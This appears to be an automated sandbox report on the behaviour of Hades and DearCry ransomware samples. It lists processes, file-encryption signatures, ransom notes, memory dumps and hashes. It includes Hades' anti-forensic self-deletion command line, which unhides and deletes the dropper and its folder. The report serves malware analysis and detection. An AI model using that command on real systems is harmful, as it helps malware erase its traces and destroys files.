Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Users\Admin\AppData\Roaming\DsDownload\Serv

C:\Users\Admin\AppData\Roaming\DsDownload\Serv /go

C:\Windows\SYSTEM32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\DsDownload\Serv" & del "C:\Users\Admin\AppData\Roaming\DsDownload\Serv" & rd "C:\Users\Admin\AppData\Roaming\DsDownload\"

C:\Windows\SYSTEM32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & rd "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Roaming\DsDownload\Serv"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/4864-0-0x0000000002020000-0x00000000021E2000-memory.dmp

memory/4864-1-0x0000000140000000-0x00000001401E2000-memory.dmp

C:\Users\Admin\AppData\Roaming\DsDownload\Serv

MD5 9fa1ba3e7d6e32f240c790753cdaaf8e
SHA1 7bcea3fbfcb4c170c57c9050499e1fae40f5d731
SHA256 fe997a590a68d98f95ac0b6c994ba69c3b2ece9841277b7fecd9dfaa6f589a87
SHA512 8d2fb58cb8776ead15f445671431eae13a00b48921e545c7ecbf91829015d818d663d9369f181de669ebb771b113c2f675c3a156fac5ede019b5fad9cb8c65fe

memory/4864-8-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2456-10-0x0000000002080000-0x0000000002242000-memory.dmp

memory/2456-11-0x0000000140000000-0x00000001401E2000-memory.dmp

C:\Users\Admin\Desktop\HOW-TO-DECRYPT-gn9cj.txt

MD5 0c6d0a67b942d06fe27f41c7c582cdfe
SHA1 7e674cf6375b138cabca2706583d4ced7a1aef27
SHA256 014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c
SHA512 53ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c

memory/2456-343-0x0000000002080000-0x0000000002242000-memory.dmp

memory/2456-342-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/4864-345-0x0000000002020000-0x00000000021E2000-memory.dmp

memory/4864-344-0x0000000140000000-0x00000001401E2000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:39

Platform

win7-20240704-en

Max time kernel

1440s

Max time network

1449s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Signatures

DearCry

ransomware dearcry

Renames multiple (3331) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UGUBWRQR\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CGY9ZAGI\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\OORJZY5Z\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U42VY3XA\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4NH6FMWO\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VUPQHL12\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TWVGEE8A\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SX809FAK\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\gadget.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EVRGREEN\THMBNAIL.PNG.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\settings.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VC\msdia90.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATALOG.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Internet Explorer\perfcore.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\xlsrvintl.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\flyout.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libspeex_resampler_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSOSTYLE.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.XML.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\cpu.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\de\PresentationFramework.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\freebl3.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\notification_helper.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\javafx-font.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\settings.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\libblendbench_plugin.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\css\clock.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue.css.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047_576black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\management.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\Mahjong.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\gadget.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\SETUP.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\wlsrvc.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7ES.DLL.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Stationery\1033\NOTEBOOK.HTM.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\LOCALDV.DLL.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.JS.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\es\Microsoft.Build.Utilities.v3.5.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Background_Loading.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\css\settings.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Network

N/A

Files

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml

MD5 0f96cefe93c14e6adece5ea787d35fb5
SHA1 3dfb1f74beab2ed12f2de06c0410e569058cb693
SHA256 748f3778ee8e6d99b6e2ad300c320383c83bc004e6b6cde2b89e522cf7143630
SHA512 6daba5b8440d657fb6fbf26d7c1fc276ae6511557f376c1b60f10b93e5978f5d3b2e610dd39ad298d7f78d78c31f048e818b6c3b2f195e5be903b65b9424fc29

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png

MD5 9a530c475ef73c5896d7c7f3543b1d97
SHA1 bc80f3430254af79f06be0d37d71cca604fccae9
